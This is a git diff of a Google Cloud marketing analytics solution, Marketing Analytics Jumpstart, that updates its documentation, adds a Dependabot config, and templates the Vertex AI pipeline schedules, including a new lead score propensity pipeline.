diff --git a/.github/dependabot.yaml b/.github/dependabot.yaml new file mode 100644 index 00000000..446421eb --- /dev/null +++ b/.github/dependabot.yaml @@ -0,0 +1,31 @@ +# Copyright 2023 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +--- +version: 2 +updates: + - directories: + - /infrastructure/terraform + commit-message: + prefix: "chore(deps)" + package-ecosystem: "terraform" + schedule: + interval: "daily" + groups: + terraform: + applies-to: version-updates + patterns: + - hashicorp/* + - terraform-google-modules/* + - GoogleCloudPlatform/* diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index c91a8010..9ed2b7f9 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -35,40 +35,20 @@ for this purpose. ### Fork this repo. -Follow the typical Github guide on how to [fork a repo](https://docs.github.com/en/get-started/quickstart/fork-a-repo). +Follow the typical GitHub guide on how to [fork a repo](https://docs.github.com/en/get-started/quickstart/fork-a-repo). **Note**: 1. To keep track of the new releases, configure git to [sync your fork with this upstream repository](https://docs.github.com/en/get-started/quickstart/fork-a-repo#configuring-git-to-sync-your-fork-with-the-upstream-repository). -2. Don't submit a Pull Request to this upstream Github repo if you don't want to expose your environment configuration. You're at your own risk at exposing your company data. +2. Don't submit a Pull Request to this upstream GitHub repo if you don't want to expose your environment configuration. You expose your company data at your own risk. 3. Observe your fork is also public, you cannot make your own fork a private repo. ### Complete the installation guide -Complete the installation guide in a Google Cloud project in which you're developer and/or owner. - -### Configure Continuous Integration recipes - -Connect your Github repository by following this [guide](https://cloud.google.com/build/docs/automating-builds/github/connect-repo-github). - -In your Google Cloud project, configure Cloud Build triggers to be executed when you push code into your branch. Update the Clould build recipes in the `cloudbuild` folder and deploy them. - -### Update GCloud and Install Beta - -```bash -gcloud components update -gcloud components install beta -``` - -### Install packages to define components, run locally and compile pipeline - -```bash -pip install poetry -poetry install -``` +Complete the manual installation guide, for testing purposes, in a Google Cloud project in which you're a developer and/or owner. ### Modify the code and configurations as you prefer -Do all the code changes you wish. +Do all the code changes you wish or need. If you're implementing new use cases, add the new resources to the existing terraform module components. If you're implementing a new component, implement your own terraform module for it.
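A rough sketch of that workflow, assuming a hypothetical module name and reusing the terraform commands this guide already describes:

```bash
# Hypothetical example: scaffold a new use-case module next to the existing ones.
mkdir -p infrastructure/terraform/modules/my_new_use_case
# Add main.tf, variables.tf and outputs.tf for the new component, wire the module
# into the existing Terraform configuration, then review the plan before applying.
cd infrastructure/terraform
terraform init
terraform plan
```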
@@ -80,4 +60,4 @@ Change the values in the terraform templates located in the `infrastructure/terr terraform init terraform plan terraform apply -``` \ No newline at end of file +``` diff --git a/DEVELOPMENT.md b/DEVELOPMENT.md index f85ace50..e72dee1b 100644 --- a/DEVELOPMENT.md +++ b/DEVELOPMENT.md @@ -2,8 +2,8 @@ Marketing Analytics Jumpstart consists of an easy, extensible and automated implementation of an end-to-end solution that enables Marketing Technology teams to store, transform, enrich with 1PD and analyze marketing data, and programmatically send predictive events to Google Analytics 4 to support conversion optimization and remarketing campaigns. ## Developer pre-requisites -Use Visual Studio Code to develop the solution. Install Gemini Code Assistant, Docker, Github, Hashicopr Terraform, Jinja extensions. -You should have Python 3, Poetry, Terraform, Git and Docker installed in your developer terminal environment. +Use Visual Studio Code to develop the solution. Install the Gemini Code Assistant, Docker, GitHub, HashiCorp Terraform and Jinja extensions. +You should have Python 3, uv, Terraform, Git and Docker installed in your developer terminal environment. ## Preparing development environment @@ -65,7 +65,6 @@ Here's a brief breakdown of the contents of each folder: * * `procedures/`: This folder contains the JINJA template files with the `.sqlx` extension used to generate the stored procedures deployed in BigQuery. * * `queries/`: This folder contains the JINJA template files with the `.sqlx` extension used to generate the queries deployed in BigQuery. * `templates/`: -* * `app_payload_template.jinja2`: This file defines the JINJA template used to generate the payload for the Measurement Protocol API used by the Activation Application. * * `activation_query`: This folder contains the JINJA template files with the `.sqlx` extension used to generate the SQL queries for each use case used by the Activation Application to get all the predictions to be prepared and send to Google Analytics 4. ## Out-of-the-box configuration parameters provided by the solution diff --git a/README.md b/README.md index c5c65457..1919e99f 100644 --- a/README.md +++ b/README.md @@ -1,10 +1,22 @@ # Marketing Analytics Jumpstart -Marketing Analytics Jumpstart is a terraform automated, quick-to-deploy, customizable end-to-end marketing solution on Google Cloud Platform (GCP). This solution aims at helping customer better understand and better use their digital advertising budget. +Marketing Analytics Jumpstart (MAJ) is a Terraform-automated, quick-to-deploy, customizable end-to-end marketing solution on Google Cloud Platform (GCP). This solution aims at helping customers better understand and better use their digital advertising budget. -Customers are looking to drive revenue and increase media efficiency be identifying, predicting and targeting valuable users through the use of machine learning. However, marketers first have to solve the challenge of having a number of disparate data sources that prevent them from having a holistic view of customers. Marketers also often don't have the expertise and/or resources in their marketing departments to train, run, and activate ML models on paid channels. Without this solution that enables innovation through predictive analytics, marketers are missing opportunities to advance their marketing program and accelerate key goals and objectives (e.g. acquire new customers, improve customer retention, etc).
+Customers in the online sales and lead generation business are looking to drive revenue and increase media efficiency by identifying, predicting and targeting valuable users through the use of machine learning. However, marketers first have to solve the challenge of having a number of disparate data sources that prevent them from having a holistic view of customers. Marketers also often don't have the expertise and/or resources in their marketing departments to train, run, and activate ML models on paid channels. Without this solution that enables innovation through predictive analytics, marketers are missing opportunities to advance their marketing program and accelerate key goals and objectives (e.g. acquire new customers, generate leads, improve customer retention, etc). +## Version Variants -## Benefits | Version Name | Branch | Purpose | | ------------ | ------ | ------- | | Multi Stream Activation | [multi-stream-activation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/tree/multi-stream-activation) | Activate to multiple Google Analytics 4 data streams (websites and applications). | | Multi Property | [multi-property](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/tree/multi-property) | Deployment of multiple MAJ resources for each Google Analytics 4 property in the same Google Cloud project. | + +## Quick Installation ⏰ + +Want to quickly install and use it? Run this [installation notebook πŸ“”](https://colab.sandbox.google.com/github/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/notebooks/quick_installation.ipynb) on Google Colaboratory and get Marketing Analytics Jumpstart up and running in 30-45 minutes. + +If that was just too fast, continue reading this document to learn more in detail. + +## Benefits 🫴 After installing the solution users will get: * Scheduled ETL jobs for an extensible logical data model based on the Google Analytics 4 (GA4) and Google Ads (GAds) daily exports * Validated feature engineering SQL transformations from event-level data to user-level data for reporting and machine learning models training and prediction @@ -13,40 +25,61 @@ After installing the solution users will get: * Activation application that sends models prediction to GA4 via Measurement Protocol API -## Who can benefit from this solution? -This solution is intended for Marketing Technologist teams using GA4 and GAds products. It facilitates efforts to store, transform, analyze marketing data, and programmatically creates audiences segments in Google Ads to support conversion optimization and remarketing campaigns. +## Who can benefit from this solution? πŸ™‡β€β™€οΈ +This solution is intended for Marketing Technology teams working in the online sales and lead generation business using GA4 and GAds products. It facilitates efforts to store, transform and analyze marketing data, and to programmatically create audience segments and optimize your bids in Google Ads, with the goal of conversion optimization and efficiency of your ad spend. | Role | User Journeys | Skillset | Can Deploy? | |-------|-------------|----------|-------------| -| Marketing Scientist | Using an isolated and secure sandbox infrastructure to perform and monitor explorations with sensitive data. Using automated machine learning to accelerate time-to-value on building use cases solutions. Faster learning curve to quickly and easily access and analyze data from the marketing data store. Ability to collaborate with other teams by reusing similar components.
| Vertex AI, Python, SQL, Data Science | No | -| Marketing Analyst | Simplifying the operation of the marketing data store (data assertions), machine learning pipelines (model training, prediction, explanation) and the activation application. Monitoring Ads Campaigns Performance, Web Traffic and Predictive Insights Reports. Interpreting the insights provided to plan and activate Ads campaigns. Defining audience segments using predictive metrics. | BigQuery, Looker Studio, Google Analytics 4, Google Ads | Yes | - | Digital Marketing Manager | Gaining insights into customer behavior to improve marketing campaigns. Identifying and targeting new customers. Measuring the effectiveness of marketing campaigns. | Looker Studio, Google Analytics 4, Google Ads | No | -| IT/Data Engineer | Building and maintaining marketing data store transformation jobs. Developing and deploying custom marketing use cases reusing a consistent infrastructure. Integrating 1st party data and Google 3rd party data by extending the marketing data store. | Python, SQL, Google Cloud Platform, Data Engineering | Yes | +| Marketing Scientist πŸ‘©β€πŸ”¬ | Using an isolated and secure sandbox infrastructure to perform and monitor explorations with sensitive data. Using automated machine learning to accelerate time-to-value on building use case solutions. Faster learning curve to quickly and easily access and analyze data from the marketing data store. Ability to collaborate with other teams by reusing similar components. | Vertex AI, Python, SQL, Data Science | No | +| Marketing Analyst πŸ§‘β€πŸ’Ό | Simplifying the operation of the marketing data store (data assertions), machine learning pipelines (model training, prediction, explanation) and the activation application. Monitoring Ads Campaigns Performance, Web Traffic and Predictive Insights Reports. Interpreting the insights provided to plan and activate Ads campaigns. Defining audience segments using predicted values and optimizing bidding using conversion values. | BigQuery, Looker Studio, Google Analytics 4, Google Ads | Yes | + | Digital Marketing Manager πŸ€΅β€β™‚οΈ | Gaining insights into customer behavior to improve marketing campaigns. Democratizing access to digital marketing insights and strategizing campaign execution. Measuring the effectiveness of marketing campaigns. | Looker Studio, Google Analytics 4, Google Ads | No | +| IT/Data Engineer πŸ‘©β€πŸ’» | Building and maintaining marketing data store transformation jobs. Developing and deploying custom marketing use cases reusing a consistent infrastructure. Integrating 1st party data and Google 3rd party data by extending the marketing data store. | Python, SQL, Google Cloud Platform, Data Engineering | Yes | -## Use Cases -This solution enables customer to plan and take action on their marketing campaigns by interpreting the insights provided by four common predictive use cases (purchase propensity, customer lifetime value, audience segmentation and aggregated value based bidding) and an operation dashboard that monitors Campaigns, Traffic, User Behavior and Models Performance, using the best of Google Cloud Data and AI products and practices. +## Use Cases πŸ–±οΈ +This solution enables customers to plan and take action on their marketing campaigns by interpreting the insights provided by these common predictive use cases and reports that inform Campaign Performance, Traffic, User Behavior and Model Prediction insights, using the best of Google Cloud Data and AI products.
These insights are used to serve as a basis to optimize paid media efforts and investments by: * Building audience segments by using all Google first party data to identify user interests and demographic characteristics relevant to the campaign -* Improving campaign performance by identifying and targeting users deciles most likely to take an action (i.e. purchase, sign-up, churn, abandon a cart, etc) +* Improving campaign performance by identifying and targeting user deciles most likely to take an action (i.e. purchase, churn, etc) * Driving a more personalized experience for your highly valued customers and improve return on ads spend (ROAS) via customer lifetime value -* Attributing bidding values to specific users according to their journeys through the conversion funnel which Ads platform uses to guide better campaign performance in specific markets - - -## Repository Structure +* Attributing bidding values to specific users according to their journeys through the conversion funnel, which the Ads platform uses to maximize conversions in specific markets + +### Ecommerce Use Cases +| Use Case | Data Sources | Model | Looker Report Name | Google Ads Campaign Optimization | +|-------|-------|-------|--------|--------| +| Purchase Propensity | Google Analytics 4 | Vertex AI Tabular Workflows AutoML | Propensity to Purchase | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing)<br><br>Bid Adjustment (maximize conversions) [1](https://support.google.com/google-ads/answer/7068417?hl=en#zippy=%2Ctips-for-setting-up-data-segments-for-search-ads%2Csetting-bids-tailoring-ads-and-copying-campaigns) [2](https://support.google.com/google-ads/answer/2732132?sjid=8368074830549837931-NA#zippy=%2Cremarketing-lists-for-search-ads-advanced) | +| Customer Lifetime Value | Google Analytics 4 | Vertex AI Tabular Workflows AutoML | Customer Lifetime Value | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing)<br><br>Bid Adjustment (maximize conversions) [1](https://support.google.com/google-ads/answer/7068417?hl=en#zippy=%2Ctips-for-setting-up-data-segments-for-search-ads%2Csetting-bids-tailoring-ads-and-copying-campaigns) [2](https://support.google.com/google-ads/answer/2732132?sjid=8368074830549837931-NA#zippy=%2Cremarketing-lists-for-search-ads-advanced) | +| Aggregated Value Based Bidding | Google Analytics 4 | Vertex AI Tabular Workflows AutoML | High Value Action | [Static Conversion Values](https://support.google.com/google-ads/answer/13064107?sjid=13060303839552593837-NA#zippy=%2Cset-a-conversion-value%2Cchange-a-conversion-value) | +| Auto Audience Segmentation | Google Analytics 4 | BQML KMeans | Interest based Audience Segmentation | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing) | +| Churn Propensity | Google Analytics 4 | Vertex AI Tabular Workflows AutoML | Propensity to Churn | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing) | +| Audience Segmentation | Google Analytics 4 | BQML KMeans | Demographic based Audience Segmentation | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing) | + + +### Lead Generation (Non-ecommerce) Use Cases +| Use Case | Data Sources | Model | Looker Report Name | Google Ads Campaign Optimization | +|-------|-------|-------|--------|--------| +| Lead Score Propensity | Google Analytics 4 | Vertex AI Tabular Workflows AutoML | Lead Score Propensity | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing)<br><br>Bid Adjustment (maximize conversions) [1](https://support.google.com/google-ads/answer/7068417?hl=en#zippy=%2Ctips-for-setting-up-data-segments-for-search-ads%2Csetting-bids-tailoring-ads-and-copying-campaigns) [2](https://support.google.com/google-ads/answer/2732132?sjid=8368074830549837931-NA#zippy=%2Cremarketing-lists-for-search-ads-advanced) | +| Aggregated Value Based Bidding | Google Analytics 4 | Vertex AI Tabular Workflows AutoML | High Value Action | [Static Conversion Values](https://support.google.com/google-ads/answer/13064107?sjid=13060303839552593837-NA#zippy=%2Cset-a-conversion-value%2Cchange-a-conversion-value) | +| Auto Audience Segmentation | Google Analytics 4 | BQML KMeans | Interest based Audience Segmentation | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing) | +| Audience Segmentation | Google Analytics 4 | BQML KMeans | Demographic based Audience Segmentation | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing) | + +## Repository Structure πŸ—οΈ The solution's source code is written in Terraform, Python, SQL, YAML and JSON; and it is organized into five main folders: * `config/`: This folder contains the configuration file for the solution. This file define the parameters and settings used by the various components of the solution. +* `docs/`: This folder contains the detailed architecture, design principles, deployment, basic operation and troubleshooting guides for all the solution components. * `infrastructure/terraform/`: This folder contains the Terraform modules, variables and the installation guide to deploy the solution's infrastructure on GCP. * `infrastructure/terraform/modules/`: This folder contains the Terraform modules and their corresponding Terraform resources. These modules corresponds to the architectural components broken down in the next section. +* `notebooks/`: Contains Python notebooks to be used in workshop sessions. * `python/`: This folder contains most of the Python code. This code implements the activation application, which sends model predictions to Google Analytics 4; and the custom Vertex AI pipelines, its components and the base component docker image used for feature engineering, training, prediction, and explanation pipelines. It also implements the cloud function that triggers the activation application, and the Google Analytics Admin SDK code that creates the custom dimensions on the GA4 property. +* `scripts/`: Miscellaneous scripts to support installation and operation of the solution. * `sql/`: This folder contains the SQL code and table schemas specified in JSON files. This code implements the stored procedures used to transform and enrich the marketing data, as well as the queries used to invoke the stored procedures and retrieve the data for analysis. * `templates/`: This folder contains the templates for generating the Google Analytics 4 Measurement Protocol API payloads used to send model predictions to Google Analytics 4. In addition to that, there is a `tasks.py` file which implements python invoke tests who hydrate values to the JINJA template files with the `.sqlx` extension located in the `sql/` folder that defines the DDL and DML statements for the BigQuery datasets, tables, procedures and queries.
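As a rough usage sketch of those invoke tasks (the task name is a placeholder, and this assumes the standard `invoke` CLI run through `uv`):

```bash
# Hypothetical invocation of the template-hydration tasks defined in tasks.py.
uv run invoke --list          # list the tasks defined in tasks.py
uv run invoke <task-name>     # hydrate the .sqlx Jinja templates under sql/ into BigQuery DDL and DML
```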
-## High Level Architecture +## High Level Architecture πŸ“‹ ![High Level Architecture](docs/images/reference_architecture.png) The provided architecture diagram depicts the high-level architecture of the Marketing Analytics Jumpstart solution. Let's break down the components: @@ -82,7 +115,7 @@ The provided architecture diagram depicts the high-level architecture of the Mar This high-level architecture demonstrates how Marketing Analytics Jumpstart integrates various Google Cloud services to provide a comprehensive solution for analyzing and activating your marketing data. -## Advantages +## Advantages πŸ”¦ 1. Easy to deploy: Deploy the resources and use cases that you need. 2. Cost Effective: Pay only for the cost of infrastructure in order to maintain the Data Store, Feature Store and ML Models. 3. Keep control of your data: This solution runs entirely in your environment and doesn’t transfer data out of your ownership or organization. @@ -92,30 +125,47 @@ This high-level architecture demonstrates how Marketing Analytics Jumpstart inte ## Installation Pre-Requisites - [ ] [Create GCP project](https://cloud.google.com/resource-manager/docs/creating-managing-projects#creating_a_project) and [Enable Billing](https://cloud.google.com/billing/docs/how-to/modify-project) -- [ ] Set up [Google Analyics 4 Export](https://support.google.com/analytics/answer/9823238?hl=en#zippy=%2Cin-this-article) and [Google Ads Export](https://cloud.google.com/bigquery/docs/google-ads-transfer) to Bigquery +- [ ] Set up [Google Analytics 4 Export](https://support.google.com/analytics/answer/9823238?hl=en#zippy=%2Cin-this-article) and [Google Ads Data Transfer Service](https://cloud.google.com/bigquery/docs/google-ads-transfer) to BigQuery - [ ] [Backfill](https://cloud.google.com/bigquery/docs/google-ads-transfer) BigQuery Data Transfer service for Google Ads - [ ] Have existing Google Analytics 4 Property with [Measurement ID](https://support.google.com/analytics/answer/12270356?hl=en) -**Note:** Google Ads Customer Matching currently only works with Google Analytics 4 **Properties** linked to Google Ads Accounts, it won't work for subproperties or Rollup properties. +**Note:** Google Ads Customer Matching currently only works with Google Analytics 4 **Properties** and **Subproperties** linked to Google Ads Accounts; it won't work for Rollup properties. ## Installation Permissions and Privileges - [ ] Google Analytics Property Editor or Owner - [ ] Google Ads Reader -- [ ] Project Owner for GCP Project -- [ ] Github or Gitlab account priviledges for repo creation and access token. [Details](https://cloud.google.com/dataform/docs/connect-repository) +- [ ] Project Owner* for a Google Cloud Project +- [ ] GitHub or GitLab account privileges for repo creation and access token. [Details](https://cloud.google.com/dataform/docs/connect-repository) + +**Note:** Project Owner for a Google Cloud Project is only required to speed up the deployment process. Consult this [guide]() for a more fine-grained permission list that does not include the Owner role, to adhere to your company policies. + +## Compute regions and data locations compatibility + +This solution is compatible with all the compute regions and data locations in the following lists: + +| | Compute Regions | +|-------|-------| +https://cloud.google.com/compute/docs/regions-zones#available<br><br>https://cloud.google.com/vertex-ai/docs/general/locations<br><br>https://cloud.google.com/dataflow/docs/resources/locations | "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast3", "asia-south1", "asia-southeast1", "asia-southeast2", "australia-southeast1", "europe-west1", "europe-west2", "europe-west3", "europe-west4", "europe-west6", "europe-west12", "me-central1", "me-central2", "northamerica-northeast1", "southamerica-east1", "us-central1", "us-east1", "us-east4", "us-east5", "us-south1", "us-west1", "us-west2", "us-west4" | + +| | Data Locations | +|-------|-------| +https://cloud.google.com/bigquery/docs/locations | "US", "EU", "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast2", "asia-northeast3", "asia-south1", "asia-south2", "asia-southeast1", "asia-southeast2", "australia-southeast1", "australia-southeast2", "europe-central2", "europe-north1", "europe-west1", "europe-west2", "europe-west3", "europe-west4", "europe-west6", "europe-west8", "europe-west9", "northamerica-northeast1", "northamerica-northeast2", "southamerica-east1", "southamerica-west1", "us-central1", "us-central2", "us-east1", "us-east4", "us-west1", "us-west2", "us-west3", "us-west4" | + +## Step by Step Installation πŸ‘·β€β™€οΈ -## Installation -Please follow the step by step installation guide with Google Cloud Shell. +To facilitate the step by step installation process, we offer you two routes: -[![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.svg)](https://shell.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart.git&cloudshell_git_branch=main&cloudshell_workspace=&cloudshell_tutorial=infrastructure/cloudshell/tutorial.md) +* One is a guided step by step installation with the help of a Google Cloud Shell tutorial. +* The other is to follow the step by step manual installation guide, supported by a video recording. -**Note:** If you are working from a forked repository, be sure to update the `cloudshell_git_repo` parameter to the URL of your forked repository for the button link above. +To better understand which route is more appropriate for your needs, read this [documentation](./infrastructure/README.md). -The detailed installation instructions can be found at the [Installation Guide](./infrastructure/README.md). +To follow the manual installation guide, open the YouTube video below in another tab and read the instructions in the [documentation](./infrastructure/README.md) above. +[![Step by Step Installation Video](docs/images/YoutubeScreenshot.png)](https://youtu.be/JMnsIxTNbE4 "Marketing Analytics Jumpstart Installation Video") -## Contributing +## Contributing 🀝 We welcome all feedback and contributions! Please read [CONTRIBUTING.md](./CONTRIBUTING.md) for more information on how to publish your contributions. @@ -124,11 +174,13 @@ to publish your contributions. This project is licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0). -## Resources +## Resources πŸ“š This a list of public websites you can use to learn more about the Google Analytics 4, Google Ads, Google Cloud Products we used to build this solution.
| Websites | Description | |----------|-------------| +| [github.com/GoogleCloudPlatform/marketing-analytics-jumpstart-dataform](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart-dataform) | Marketing Analytics Jumpstart Dataform GitHub Repository | +| [console.cloud.google.com/marketplace/product/bigquery-data-connectors/google_ads](https://console.cloud.google.com/marketplace/product/bigquery-data-connectors/google_ads) | BigQuery Data Transfer Service for Google Ads | | [support.google.com/google-ads/*](https://support.google.com/google-ads/) [support.google.com/analytics/*](https://support.google.com/analytics/) | Google Ads and Google Analytics Support | | [support.google.com/looker-studio/*](https://support.google.com/looker-studio/) | Looker Studio Support | | [developers.google.com/analytics/*](https://developers.google.com/analytics/) [developers.google.com/google-ads/*](https://developers.google.com/analytics/) | Google Ads and Google Analytics Developers Guides | diff --git a/config/config.yaml.tftpl b/config/config.yaml.tftpl index bc14353e..f798c99e 100644 --- a/config/config.yaml.tftpl +++ b/config/config.yaml.tftpl @@ -184,14 +184,18 @@ vertex_ai: schedule: # The `cron` is the cron schedule. Make sure you review the TZ=America/New_York timezone. # More information can be found at https://cloud.google.com/scheduler/docs/configuring/cron-job-schedules. - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # The `max_concurrent_run_count` defines the maximum number of concurrent pipeline runs. max_concurrent_run_count: 1 start_time: null end_time: null - # The `state` defines the state of the pipeline. - # In case you don't want to schedule the pipeline, set the state to `PAUSED`. - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-auto-audience-segmentation.execution.schedule.state} # The `pipeline_parameters` defines the parameters that are going to be used to compile the pipeline. # Those values may difer depending on the pipeline type and the pipeline steps being used. # Make sure you review the python function the defines the pipeline. @@ -262,14 +266,18 @@ vertex_ai: schedule: # The `cron` is the cron schedule. Make sure you review the TZ=America/New_York timezone. # More information can be found at https://cloud.google.com/scheduler/docs/configuring/cron-job-schedules. - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # The `max_concurrent_run_count` defines the maximum number of concurrent pipeline runs. max_concurrent_run_count: 1 start_time: null end_time: null - # The `state` defines the state of the pipeline. - # In case you don't want to schedule the pipeline, set the state to `PAUSED`. - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". 
+ # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-audience-segmentation.execution.schedule.state} # The `pipeline_parameters` defines the parameters that are going to be used to compile the pipeline. # Those values may difer depending on the pipeline type and the pipeline steps being used. # Make sure you review the python function the defines the pipeline. @@ -320,13 +328,19 @@ vertex_ai: # `type` must be "custom", when we're building Python and/or SQL based pipelines for feature engineering purposes. type: "custom" schedule: - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # Define the maximum number of concurrent pipeline runs. # The default value is 1. max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-purchase-propensity.execution.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -375,13 +389,19 @@ vertex_ai: # `type` must be "custom", when we're building Python and/or SQL based pipelines for feature engineering purposes. type: "custom" schedule: - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # Define the maximum number of concurrent pipeline runs. # The default value is 1. max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-churn-propensity.execution.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -424,13 +444,19 @@ vertex_ai: # `type` must be "custom", when we're building Python and/or SQL based pipelines for feature engineering purposes. type: "custom" schedule: - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # Define the maximum number of concurrent pipeline runs. # The default value is 1. max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". 
+ # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-customer-ltv.execution.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -479,13 +505,19 @@ vertex_ai: type: "custom" schedule: # The cron string is - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # Define the maximum concurrent run count of the pipeline. # The default value is 1. max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-aggregated-value-based-bidding.execution.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -499,6 +531,67 @@ vertex_ai: pipeline_parameters_substitutions: aggregated_value_based_bidding_training_preparation_procedure_name: "${project_id}.aggregated_vbb.invoke_aggregated_value_based_bidding_training_preparation" aggregated_value_based_bidding_explanation_preparation_procedure_name: "${project_id}.aggregated_vbb.invoke_aggregated_value_based_bidding_explanation_preparation" + + # This pipeline contains the configuration parameters for the feature creation pipeline for the lead score propensity model. + # To deploy this pipeline to your Google Cloud project: + ## 1. Define the pipeline parameters below, following YAML format + ## 2. Define the queries and procedures SQL parameters in this file under the `bigquery` section, following YAML format + ## 3. Create the queries and procedures SQL files under sql/ folder + ## 4. Create the terraform resources in terraform/feature-store/bigquery-procedures.tf + ## 5. Create the terraform resources to compile and schedule the pipeline in terraform/pipelines/pipelines.tf + ## 6. The python functions that perform `compilation` and `upload to GCS bucket` are defined in `python/pipelines/compiler.py` and `python/pipelines/uploader.py`. + ## 7. The python function that performs the `schedule` of the pipeline is defined in `python/pipelines/scheduler.py`. + ## 8. Create the pipeline python function in python/pipelines/feature_engineering_pipelines.py + ## 9. Run terraform apply + feature-creation-lead-score-propensity: + execution: + name: "feature-creation-lead-score-propensity" + job_id_prefix: "feature-creation-lead-score-propensity-" + experiment_name: "feature-creation-lead-score-propensity" + # `type` must be "custom", when we're building Python and/or SQL based pipelines for feature engineering purposes. + type: "custom" + schedule: + cron: "TZ=${time_zone} 0 1 * * *" + # Define the maximum number of concurrent pipeline runs. + # The default value is 1. + max_concurrent_run_count: 1 + start_time: null + end_time: null + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". 
+ # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-lead-score-propensity.execution.schedule.state} + pipeline_parameters: + project_id: "${project_id}" + location: "${location}" + # The query_lead_score_propensity_label defines the procedure that will be used to invoke the creation of the lead score propensity label feature table. + query_lead_score_propensity_label: " + CALL `{lead_score_propensity_label_procedure_name}`();" + # The query_user_dimensions defines the procedure that will be used to invoke the creation of the user dimensions feature table. + query_user_dimensions: " + CALL `{user_dimensions_procedure_name}`();" + # The query_user_rolling_window_metrics defines the procedure that will be used to invoke the creation of the user rolling window metrics feature table. + query_user_rolling_window_metrics: " + CALL `{user_rolling_window_metrics_procedure_name}`();" + # The query_lead_score_propensity_inference_preparation defines the procedure that will be used to invoke the creation of the lead score propensity inference preparation table. + query_lead_score_propensity_inference_preparation: " + 